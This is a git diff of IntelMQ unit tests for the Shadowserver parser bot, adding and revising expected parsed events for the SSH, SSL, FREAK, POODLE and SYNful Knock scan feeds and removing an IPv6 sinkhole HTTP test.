+   'extra.available_kex' : 'diffie-hellman-group-exchange-sha1, diffie-hellman-group14-sha1, diffie-hellman-group1-sha1',
+   'extra.available_mac' : 'hmac-sha1, hmac-sha1-96, hmac-md5, hmac-md5-96',
+   'extra.device_sector' : 'enterprise',
+   'extra.device_vendor' : 'Cisco',
+   'extra.rsa_exponent' : '65537',
+   'extra.rsa_length' : '4096',
+   'extra.rsa_modulus' : 'yFVwcChoYt+YGm8BzWYugcZbNQRrQ1VWRYcL4U6SSkyoVeE9h5wxRu/hQaWHo3PdsB9Nuln/riRyKZypFUEZ5zlffMyl1uvE8/jp8E/GgUHSyPkGAwu8C8BkX/nDolxAJKTK6djiZnvhsEPe6AXHBMHbto/b3GABUNPngjzX8D63GYcFW9NJLf5qC1UsVkXbAzM0IjQ2X9s3pfhUCAJeXAn2i0gEGtUyF8vEjNdwdG655aXciKrpEEtM1L/zy/+gLH4YC13kAYI7NVyH+qi/mXbULLOQClA7iYK1g3Et58jWUIPwgLfF3SLC57bt2wp/lRgNTv4FBi0tWvRqBnf5UQK5ZjgzbW3bO+Ju4cWgH/4M4NCxSceh4cLm5lQs01xB5feSh2ByqA7wrVDoFJu81LoMVo4bCz30+lH2QsLwmNtUhlWLKBD4k09g4bgBa4jPj0/Nya3rBR4GQ6LG6ltFQotm8wCkgbv76YWqk20nQ6NMYZFvSQm981JFtoHv3vxq48VeHDV0QvV0P12BCFprRf4B0otIvSsHl+LDeUxJAf+Nbw78gzncjyfCbWtCPbwaJQ8CeqnTBzj5TluaFvN8goG5lCTWJGfjIrwAZXOokv9NOqmIiMJJx3s22OX6GHfJAzje2ALLDsAiXBub4iCOdGdTfVbBpFL+bGTK9qfa8vE=',
+   'extra.selected_cipher' : 'aes128-cbc',
+   'extra.selected_compression' : 'none',
+   'extra.selected_kex' : 'diffie-hellman-group14-sha1',
+   'extra.selected_mac' : 'hmac-sha1',
+   'extra.server_cookie' : 'Z2fOfWsrLlh76Y0bOqa1cw==',
+   'extra.server_host_key' : 'AAAAB3NzaC1yc2EAAAADAQABAAACAQDIVXBwKGhi35gabwHNZi6Bxls1BGtDVVZFhwvhTpJKTKhV4T2HnDFG7+FBpYejc92wH026Wf+uJHIpnKkVQRnnOV98zKXW68Tz+OnwT8aBQdLI+QYDC7wLwGRf+cOiXEAkpMrp2OJme+GwQ97oBccEwdu2j9vcYAFQ0+eCPNfwPrcZhwVb00kt/moLVSxWRdsDMzQiNDZf2zel+FQIAl5cCfaLSAQa1TIXy8SM13B0brnlpdyIqukQS0zUv/PL/6AsfhgLXeQBgjs1XIf6qL+ZdtQss5AKUDuJgrWDcS3nyNZQg/CAt8XdIsLntu3bCn+VGA1O/gUGLS1a9GoGd/lRArlmODNtbds74m7hxaAf/gzg0LFJx6HhwubmVCzTXEHl95KHYHKoDvCtUOgUm7zUugxWjhsLPfT6UfZCwvCY21SGVYsoEPiTT2DhuAFriM+PT83JresFHgZDosbqW0VCi2bzAKSBu/vphaqTbSdDo0xhkW9JCb3zUkW2ge/e/GrjxV4cNXRC9XQ/XYEIWmtF/gHSi0i9KweX4sN5TEkB/41vDvyDOdyPJ8Jta0I9vBolDwJ6qdMHOPlOW5oW83yCgbmUJNYkZ+MivABlc6iS/006qYiIwknHezbY5foYd8kDON7YAssOwCJcG5viII50Z1N9VsGkUv5sZMr2p9ry8Q==',
+   'extra.server_host_key_sha256' : '06ff3cce443ed832927576d982b69d5a526d0e63334c72e87201deda61679406',
+   'extra.server_signature_raw' : 'AAAAB3NzaC1yc2EAAAIAlrzL2DY9fVvwYg6CgB75uf2s8CLo+rL8Mp9tU1Ja3sDfBzj9QJjVDykupiy8s3usHfxMrHS2v3DhTiZjz/b5K6tVTgUBTXL94JfM4lwB+3EbLggPzKnlm1jQgnnU9c+tb7RX3IhBqU9Yj1gqxhErv9NFotgajQOOLgY0Ua5C0Ee+AIaMlLaNZe3LTejMsNUZMN5tl+sEmtutMHkGQsmjJxiJ3feF+Pys0I2+ojiiAfzqlMYar/5xOPl4Dj+HO+h91xVQ1/8nQRBc082fM7+ZJtDbRLtt4G8srlB5gew26jqfVASc/ui5gx4+BR9DG9VH8w+rJWBGfhOAaWqLFE2M3YuEWkjEmQMR1SQK1WFQ/oNiWJO2K5L3rk2LcAmyR6nQMtClVxYZ7CQOwa3uFL+JNXp9AhiiAtVaqhrEK81NJrJNh/+egTBl5STphxIShXd4KI9wyvkGlCIvNIMO94iXPVaWUXXbsGnU03+dsUkBzGf0eJ4DePInCk/RtunlSmOsjGld+rpS9g0VRxPrzbQRWuhpkgpV+CldyrI3C/rOxJRs2vSAKXocRsGwhqEKseAJzHXmiZ5ncsaGKoeB5lUkWLwcKjyok2tHVCDlzDUpE4aA/JHNEhT48det9RqtjC71yz8m0PeK2ySI/I+Qb7eBgevgduBmt+OUxgvfKi2UB6s=',
+   'extra.server_signature_value' : 'lrzL2DY9fVvwYg6CgB75uf2s8CLo+rL8Mp9tU1Ja3sDfBzj9QJjVDykupiy8s3usHfxMrHS2v3DhTiZjz/b5K6tVTgUBTXL94JfM4lwB+3EbLggPzKnlm1jQgnnU9c+tb7RX3IhBqU9Yj1gqxhErv9NFotgajQOOLgY0Ua5C0Ee+AIaMlLaNZe3LTejMsNUZMN5tl+sEmtutMHkGQsmjJxiJ3feF+Pys0I2+ojiiAfzqlMYar/5xOPl4Dj+HO+h91xVQ1/8nQRBc082fM7+ZJtDbRLtt4G8srlB5gew26jqfVASc/ui5gx4+BR9DG9VH8w+rJWBGfhOAaWqLFE2M3YuEWkjEmQMR1SQK1WFQ/oNiWJO2K5L3rk2LcAmyR6nQMtClVxYZ7CQOwa3uFL+JNXp9AhiiAtVaqhrEK81NJrJNh/+egTBl5STphxIShXd4KI9wyvkGlCIvNIMO94iXPVaWUXXbsGnU03+dsUkBzGf0eJ4DePInCk/RtunlSmOsjGld+rpS9g0VRxPrzbQRWuhpkgpV+CldyrI3C/rOxJRs2vSAKXocRsGwhqEKseAJzHXmiZ5ncsaGKoeB5lUkWLwcKjyok2tHVCDlzDUpE4aA/JHNEhT48det9RqtjC71yz8m0PeK2ySI/I+Qb7eBgevgduBmt+OUxgvfKi2UB6s=',
+   'extra.serverid_raw' : 'SSH-1.99-Cisco-1.25',
+   'extra.serverid_software' : 'Cisco-1.25',
+   'extra.serverid_version' : '1.99',
+   'extra.source.naics' : 517311,
+   'extra.tag' : 'ssh',
+   'extra.userauth_methods' : 'publickey, keyboard-interactive, password',
+   'feed.name' : 'Accessible SSH',
+   'protocol.transport' : 'tcp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[3]])),
+   'source.asn' : 33363,
+   'source.geolocation.cc' : 'US',
+   'source.geolocation.city' : 'ORLANDO',
+   'source.geolocation.region' : 'FLORIDA',
+   'source.ip' : '72.17.0.0',
+   'source.port' : 22,
+   'source.reverse_dns' : '072-017-0-0.example.com',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T02:20:37+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_ssl.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_ssl.py
new file mode 100644
index 000000000..d3c818c33
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_ssl.py
@@ -0,0 +1,218 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/scan_ssl.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'Accessible SSL',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2022-01-07T00:00:00+00:00",
+                  "extra.file_name": "2022-01-07-scan_ssl-test.csv",
+                  }
+EVENTS = [
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-ssl',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'other',
+   'extra.browser_error' : 'x509: unknown error',
+   'extra.browser_trusted' : 'N',
+   'extra.cert_expiration_date' : '2038-01-19 03:14:07',
+   'extra.cert_expired' : False,
+   'extra.cert_issue_date' : '2014-06-23 09:56:32',
+   'extra.cert_length' : 1024,
+   'extra.cert_serial_number' : '168CAE',
+   'extra.cert_valid' : True,
+   'extra.cipher_suite' : 'TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA',
+   'extra.content_length' : 131,
+   'extra.content_type' : 'text/html',
+   'extra.freak_vulnerable' : 'N',
+   'extra.handshake' : 'TLSv1.2',
+   'extra.http_code' : 200,
+   'extra.http_date' : '2022-01-10T00:01:44+00:00',
+   'extra.http_reason' : 'OK',
+   'extra.http_response_type' : 'HTTP/1.1',
+   'extra.issuer_common_name' : 'support',
+   'extra.issuer_country' : 'US',
+   'extra.issuer_email_address' : 'support@fortinet.com',
+   'extra.issuer_locality_name' : 'Sunnyvale',
+   'extra.issuer_organization_name' : 'Fortinet',
+   'extra.issuer_organization_unit_name' : 'Certificate Authority',
+   'extra.issuer_state_or_province_name' : 'California',
+   'extra.key_algorithm' : 'rsaEncryption',
+   'extra.md5_fingerprint' : '99:45:1F:2E:AE:EB:88:91:27:43:33:79:FA:93:7D:CA',
+   'extra.self_signed' : False,
+   'extra.server_type' : 'xxxxxxxx-xxxxx',
+   'extra.sha1_fingerprint' : '5A:3D:FF:06:F9:E9:25:37:57:F9:09:52:33:A4:85:15:24:2D:88:7F',
+   'extra.sha256_fingerprint' : '35:AB:B6:76:2A:3D:17:B2:FB:40:45:1B:FC:0A:99:0A:6E:48:57:F7:30:0A:3B:B1:1A:E6:99:70:5B:7C:32:41',
+   'extra.sha512_fingerprint' : '88:7B:16:DB:39:44:0C:47:0E:4A:8F:0B:C5:FB:4D:45:BC:93:5A:00:43:A1:D9:7F:05:1D:86:33:02:F8:FC:57:67:A6:1D:C0:FF:F7:D2:40:D8:9A:21:AE:4E:6D:DC:E7:FF:72:BF:13:CB:EE:A7:5F:CD:83:EA:8A:5E:FB:87:DD',
+   'extra.signature_algorithm' : 'sha1WithRSAEncryption',
+   'extra.source.naics' : 517311,
+   'extra.ssl_poodle' : 'N',
+   'extra.ssl_version' : 2,
+   'extra.subject_common_name' : 'FGT60D4614030700',
+   'extra.subject_country' : 'US',
+   'extra.subject_email_address' : 'support@fortinet.com',
+   'extra.subject_locality_name' : 'Sunnyvale',
+   'extra.subject_organization_name' : 'Fortinet',
+   'extra.subject_organization_unit_name' : 'FortiGate',
+   'extra.subject_state_or_province_name' : 'California',
+   'extra.tag' : 'ssl,vpn',
+   'feed.name' : 'Accessible SSL',
+   'protocol.application': 'https',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[1]])),
+   'source.asn' : 4181,
+   'source.geolocation.cc' : 'US',
+   'source.geolocation.city' : 'MILWAUKEE',
+   'source.geolocation.region' : 'WISCONSIN',
+   'source.ip' : '96.60.0.0',
+   'source.port' : 10443,
+   'source.reverse_dns' : '96-60-0-0.example.com',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T00:01:42+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-ssl',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'other',
+   'extra.browser_error' : 'x509: unknown error',
+   'extra.browser_trusted' : 'N',
+   'extra.cert_expiration_date' : '2023-02-06 01:01:34',
+   'extra.cert_expired' : False,
+   'extra.cert_issue_date' : '2022-01-04 01:01:34',
+   'extra.cert_length' : 2048,
+   'extra.cert_serial_number' : '36974C4C6B1B3785',
+   'extra.cert_valid' : False,
+   'extra.cipher_suite' : 'TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256',
+   'extra.content_type' : 'text/html; charset=UTF-8',
+   'extra.freak_vulnerable' : 'N',
+   'extra.handshake' : 'TLSv1.2',
+   'extra.http_code' : 200,
+   'extra.http_connection' : 'keep-alive',
+   'extra.http_date' : '2022-01-10T00:01:44+00:00',
+   'extra.http_reason' : 'OK',
+   'extra.http_response_type' : 'HTTP/1.1',
+   'extra.issuer_common_name' : '1078-btb-tbi-HungHa-61d39c6d5a7e2',
+   'extra.issuer_organization_name' : 'pfSense webConfigurator Self-Signed Certificate',
+   'extra.key_algorithm' : 'rsaEncryption',
+   'extra.md5_fingerprint' : '16:93:9A:F4:35:7F:9A:85:45:71:91:C7:7C:80:88:00',
+   'extra.self_signed' : True,
+   'extra.server_type' : 'nginx',
+   'extra.set_cookie' : 'PHPSESSID=e15bdfa5739c36877608eb4cf46cc388; path=/; secure; HttpO',
+   'extra.sha1_fingerprint' : 'A9:00:BB:E1:54:4D:56:54:59:F1:B7:EA:F1:1A:D5:36:5C:63:90:8E',
+   'extra.sha256_fingerprint' : '38:85:F0:44:1E:AD:84:B8:2F:43:68:BA:AC:EE:17:13:A4:BF:86:1D:48:75:7E:22:FA:08:4C:28:5F:AC:3E:5F',
+   'extra.sha512_fingerprint' : 'AE:1B:4F:D1:E4:C0:35:9D:2A:4F:7A:37:B8:7B:11:9D:84:25:23:21:AB:EF:B2:0F:DC:C9:F2:A3:72:28:92:E1:74:72:FA:E1:09:6C:E1:F6:B6:E3:A7:61:1C:58:89:34:D7:06:5C:3D:0A:A7:F6:CC:8A:D6:24:D0:04:4C:03:02',
+   'extra.signature_algorithm' : 'sha256WithRSAEncryption',
+   'extra.source.naics' : 517311,
+   'extra.ssl_poodle' : 'N',
+   'extra.ssl_version' : 2,
+   'extra.subject_common_name' : '1078-btb-tbi-HungHa-61d39c6d5a7e2',
+   'extra.subject_organization_name' : 'pfSense webConfigurator Self-Signed Certificate',
+   'extra.tag' : 'ssl',
+   'extra.transfer_encoding' : 'chunked',
+   'feed.name' : 'Accessible SSL',
+   'protocol.application': 'https',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[2]])),
+   'source.asn' : 45899,
+   'source.geolocation.cc' : 'VN',
+   'source.geolocation.city' : 'THAI BINH',
+   'source.geolocation.region' : 'THAI BINH',
+   'source.ip' : '113.160.0.0',
+   'source.port' : 10443,
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T00:01:42+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-ssl',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'other',
+   'extra.browser_trusted' : 'Y',
+   'extra.cert_expiration_date' : '2022-11-06 15:30:28',
+   'extra.cert_expired' : False,
+   'extra.cert_issue_date' : '2021-10-07 15:30:28',
+   'extra.cert_length' : 2048,
+   'extra.cert_serial_number' : '7B388364A24B88E77E5553B5C6748100',
+   'extra.cert_valid' : True,
+   'extra.cipher_suite' : 'TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA',
+   'extra.content_length' : 131,
+   'extra.content_type' : 'text/html',
+   'extra.freak_vulnerable' : 'N',
+   'extra.handshake' : 'TLSv1.2',
+   'extra.http_code' : 200,
+   'extra.http_date' : '2022-01-10T00:01:44+00:00',
+   'extra.http_reason' : 'OK',
+   'extra.http_response_type' : 'HTTP/1.1',
+   'extra.issuer_common_name' : 'Entrust Certification Authority - L1K',
+   'extra.issuer_country' : 'US',
+   'extra.issuer_organization_name' : 'Entrust, Inc.',
+   'extra.issuer_organization_unit_name' : '(c) 2012 Entrust, Inc. - for authorized use only',
+   'extra.key_algorithm' : 'rsaEncryption',
+   'extra.md5_fingerprint' : 'E7:34:BC:92:84:FA:39:DE:E1:46:6C:27:DA:5A:01:F4',
+   'extra.self_signed' : False,
+   'extra.server_type' : 'xxxxxxxx-xxxxx',
+   'extra.sha1_fingerprint' : 'AD:19:B2:1C:CB:88:70:9B:DB:8E:7E:F5:65:50:13:D6:43:6C:BE:6E',
+   'extra.sha256_fingerprint' : '9A:64:73:0B:8A:FA:DE:22:D4:6D:5A:C6:C4:6F:D4:A4:2A:28:FA:41:1E:FF:81:DC:D4:D9:00:FD:78:DF:C4:DD',
+   'extra.sha512_fingerprint' : '9A:B7:BD:68:7D:F3:E7:C1:B7:D3:F4:2F:01:B6:C4:77:90:A3:2B:1E:C0:89:F5:08:EC:43:87:35:60:36:D4:87:61:AA:B8:A8:B3:8A:E9:F1:04:AA:5B:67:12:FF:63:D5:14:80:77:6E:8F:7D:C3:E2:3A:F3:13:DF:08:43:6C:B0',
+   'extra.signature_algorithm' : 'sha256WithRSAEncryption',
+   'extra.source.naics' : 454110,
+   'extra.source.sector' : 'Retail Trade',
+   'extra.ssl_poodle' : 'N',
+   'extra.ssl_version' : 2,
+   'extra.subject_country' : 'US',
+   'extra.subject_locality_name' : 'Hanover',
+   'extra.subject_organization_name' : 'Ciena Corporation',
+   'extra.subject_state_or_province_name' : 'Maryland',
+   'extra.tag' : 'ssl,vpn',
+   'extra.validation_level' : 'OV',
+   'feed.name' : 'Accessible SSL',
+   'protocol.application': 'https',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[3]])),
+   'source.asn' : 14618,
+   'source.geolocation.cc' : 'US',
+   'source.geolocation.city' : 'ASHBURN',
+   'source.geolocation.region' : 'VIRGINIA',
+   'source.ip' : '34.224.0.0',
+   'source.port' : 10443,
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T00:01:42+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_ssl_freak.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_ssl_freak.py
index e70da554a..42221bda2 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_scan_ssl_freak.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_ssl_freak.py
@@ -24,6 +24,7 @@
                   }
 EVENTS = [{'__type': 'Event',
            'feed.name': 'SSL FREAK Vulnerable Servers',
+           'protocol.application': 'https',
            "classification.identifier": "ssl-freak",
            "classification.taxonomy": "vulnerable",
            "classification.type": "vulnerable-system",
@@ -32,7 +33,7 @@
            "extra.cert_expiration_date": "2032-05-05 00:01:19",
            "extra.cert_expired": False,
            "extra.cert_issue_date": "2012-05-10 00:01:19",
-           "extra.cert_length": "1024",
+           "extra.cert_length": 1024,
            "extra.cert_serial_number": "4FAB054F",
            "extra.cert_valid": True,
            "extra.cipher_suite": "TLS_RSA_WITH_RC4_128_SHA",
@@ -55,7 +56,6 @@
            "extra.subject_common_name": "usg50_B0B2DC2FA69D",
            "extra.tag": "ssl-freak",
            "extra.transfer_encoding": "chunked",
-           "protocol.application": "https",
            'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
                                                  EXAMPLE_LINES[1]])),
            "source.asn": 8447,
@@ -69,6 +69,7 @@
           },
           {'__type': 'Event',
            'feed.name': 'SSL FREAK Vulnerable Servers',
+           'protocol.application': 'https',
            "classification.identifier": "ssl-freak",
            "classification.taxonomy": "vulnerable",
            "classification.type": "vulnerable-system",
@@ -77,7 +78,7 @@
            "extra.cert_expiration_date": "2029-12-27 00:00:53",
            "extra.cert_expired": False,
            "extra.cert_issue_date": "2010-01-01 00:00:53",
-           "extra.cert_length": "1024",
+           "extra.cert_length": 1024,
            "extra.cert_serial_number": "4B3D3B35",
            "extra.cert_valid": True,
            "extra.cipher_suite": "TLS_RSA_WITH_RC4_128_SHA",
@@ -100,7 +101,6 @@
            "extra.subject_common_name": "usg20w_C86C870287EC",
            "extra.tag": "ssl-freak",
            "extra.transfer_encoding": "chunked",
-           "protocol.application": "https",
            'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
                                                  EXAMPLE_LINES[2]])),
            "source.asn": 12577,
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_ssl_poodle.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_ssl_poodle.py
index a05974ab3..41535e67a 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_scan_ssl_poodle.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_ssl_poodle.py
@@ -29,7 +29,7 @@
            'extra.cert_expiration_date': '2034-06-20 00:00:42',
            'extra.cert_expired': False,
            'extra.cert_issue_date': '2014-06-25 00:00:42',
-           'extra.cert_length': '1024',
+           'extra.cert_length': 1024,
            'extra.cert_serial_number': '53AA112A',
            'extra.cert_valid': True,
            'extra.cipher_suite': 'TLS_RSA_WITH_RC4_128_SHA',
@@ -48,7 +48,7 @@
            'extra.sha512_fingerprint': '0B:2D:48:8C:4B:55:8B:F3:AB:F8:45:ED:E0:A0:63:F4:84:2F:4C:19:DC:A8:6F:7D:6A:AF:61:D7:98:AA:58:0F:CB:CA:87:D2:C3:0B:C5:DF:49:A7:84:7C:47:58:89:7D:92:B6:7B:98:7D:B1:64:4B:DC:DD:BE:9D:11:2A:D1:AE',
            'extra.signature_algorithm': 'sha1WithRSAEncryption',
            'extra.ssl_poodle': True,
-           'extra.ssl_version': '2',
+           'extra.ssl_version': 2,
            'extra.subject_common_name': 'usg20_107BEF394BA5',
            'extra.tag': 'ssl-poodle',
            'extra.transfer_encoding': 'chunked',
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_synfulknock.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_synfulknock.py
new file mode 100644
index 000000000..9b7e1fd3d
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_synfulknock.py
@@ -0,0 +1,117 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/scan_synfulknock.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'SYNful Knock',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2022-01-07T00:00:00+00:00",
+                  "extra.file_name": "2022-01-07-scan_synfulknock-test.csv",
+                  }
+EVENTS = [
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-synfulknock',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.ack_number' : 791102,
+   'extra.raw_packet' : '3cfdfec601e4700f6a9a2000080045000034c3780000f706789442099555b869f7ee0050b20800000000000c123e8012200002aa0000020405b40101040201030305',
+   'extra.tag' : 'synfulknock',
+   'extra.tcp_flags' : '4608',
+   'extra.window_size' : 8192,
+   'feed.name' : 'SYNful Knock',
+   'protocol.transport' : 'tcp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[1]])),
+   'source.asn' : 18885,
+   'source.geolocation.cc' : 'US',
+   'source.geolocation.city' : 'JERSEY CITY',
+   'source.geolocation.region' : 'NEW JERSEY',
+   'source.ip' : '66.9.0.0',
+   'source.port' : 80,
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T09:18:23+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-synfulknock',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.ack_number' : 791102,
+   'extra.raw_packet' : '90e2baaf0b84700f6a9a200008004500003434100000f2064382d58337d2b8698b720050916200000000000c123e8012200059d50000020405b40101040201030305',
+   'extra.tag' : 'synfulknock',
+   'extra.tcp_flags' : '4608',
+   'extra.window_size' : 8192,
+   'feed.name' : 'SYNful Knock',
+   'protocol.transport' : 'tcp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[2]])),
+   'source.asn' : 35805,
+   'source.geolocation.cc' : 'GE',
+   'source.geolocation.city' : 'TBILISI',
+   'source.geolocation.region' : 'TBILISI',
+   'source.ip' : '213.131.0.0',
+   'source.port' : 80,
+   'source.reverse_dns' : 'host-213-131-55-210-customer.wanex.net',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T09:19:17+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-synfulknock',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.ack_number' : 791102,
+   'extra.raw_packet' : '90e2bab9cfd4700f6a9a20000800450000340f1d0000ea068bdad5b2e6914a522f360050eb5200000000000c123e801220001b4a0000020405b40101040201030305',
+   'extra.tag' : 'synfulknock',
+   'extra.tcp_flags' : '4608',
+   'extra.window_size' : 8192,
+   'feed.name' : 'SYNful Knock',
+   'protocol.transport' : 'tcp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[3]])),
+   'source.asn' : 29256,
+   'source.geolocation.cc' : 'SY',
+   'source.geolocation.city' : 'DAMASCUS',
+   'source.geolocation.region' : 'DIMASHQ',
+   'source.ip' : '213.178.0.0',
+   'source.port' : 80,
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T09:27:39+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_sinkhole6_http.py b/intelmq/tests/bots/parsers/shadowserver/test_sinkhole6_http.py
deleted file mode 100644
index 34fd21ab5..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/test_sinkhole6_http.py
+++ /dev/null
@@ -1,104 +0,0 @@
-# SPDX-FileCopyrightText: 2018 Sebastian Wagner
-#
-# SPDX-License-Identifier: AGPL-3.0-or-later
-
-# -*- coding: utf-8 -*-
-
-import os
-import unittest
-
-import intelmq.lib.test as test
-import intelmq.lib.utils as utils
-from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
-
-with open(os.path.join(os.path.dirname(__file__), 'testdata/sinkhole6_http.csv')) as handle:
-    EXAMPLE_FILE = handle.read()
-EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
-
-EXAMPLE_REPORT = {"feed.name": "ShadowServer IPv6 Sinkhole HTTP Drone",
-                  "raw": utils.base64_encode(EXAMPLE_FILE),
-                  "__type": "Report",
-                  "time.observation": "2015-01-01T00:00:00+00:00",
-                  "extra.file_name": "2019-01-01-sinkhole6_http-test-geo.csv",
-                  }
-EVENTS = [{'__type': 'Event',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 64511,
-           'destination.fqdn': '198-51-100-38.example.net',
-           'destination.geolocation.cc': 'NL',
-           'destination.ip': '2a02:1668:1034::2',
-           'destination.port': 80,
-           'destination.url': 'http://198-51-100-38.example.net/okla/api/1',
-           'feed.name': 'ShadowServer IPv6 Sinkhole HTTP Drone',
-           'malware.name': 'ghost-push',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[1]])),
-           'source.asn': 64511,
-   'source.geolocation.cc': 'AT',
-           'source.ip': '2001:db8:abcd:12::',
-           'source.port': 36738,
-           'time.source': '2018-04-08T09:17:36+00:00'},
-          {'__type': 'Event',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 64511,
-           'destination.fqdn': '198-51-100-38.example.net',
-           'destination.geolocation.cc': 'NL',
-           'destination.ip': '2a02:1668:1034::2',
-           'destination.port': 80,
-           'extra.http_agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) '
-                               'Gecko/20100101 Firefox/40.1',
-           'destination.url': 'http://198-51-100-38.example.net/',
-           'feed.name': 'ShadowServer IPv6 Sinkhole HTTP Drone',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[2]])),
-           'source.asn': 64511,
